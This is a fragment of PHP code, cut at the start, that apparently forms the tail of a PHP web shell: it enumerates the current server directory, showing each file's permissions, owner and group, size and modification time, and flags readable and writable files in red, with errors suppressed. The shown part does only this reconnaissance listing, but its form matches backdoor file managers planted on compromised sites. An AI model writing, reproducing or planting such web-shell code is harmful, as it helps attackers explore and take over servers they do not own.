|
|
echo "</textarea><br>\n";}
|
|
#
|
|
if(isset($error))echo $error;?>
|
|
<hr><?php
|
|
##################################################################################
|
|
if(is_readable(getcwd())){
|
|
if($h=opendir(getcwd())){
|
|
$arr=array();
|
|
while(false!==($f=readdir($h))){array_push ($arr,$f);}
|
|
closedir($h);}}
|
|
else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>");
|
|
sort($arr);
|
|
echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>';
|
|
foreach($arr as $f){
|
|
$l=@lstat($f);
|
|
print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):"")));
|
|
$r=sprintf("%o",(@fileperms($f)) & 0777);
|
|
$ow=posix_getpwuid($l[4]);
|
|
$gr=posix_getgrgid($l[5]);
|
|
$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f));
|
|
if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12);
|
|
echo "</td><td>$r</td><td>$fow</td>";
|
|
if(!is_dir($f)){
|
|
if(!is_link($f)){
|
|
echo w(2)."<td><i>".$l[7]."</i></td>";}
|
|
else echo "</td><td>link</td>";}
|
|
else echo "</td><td>DIR</td>";
|
|
$fi=htmlspecialchars($f);
|
|
echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>\n";}
|
|
?>
|
|
</table></body></html>
|
|
<?php exit; ?>
|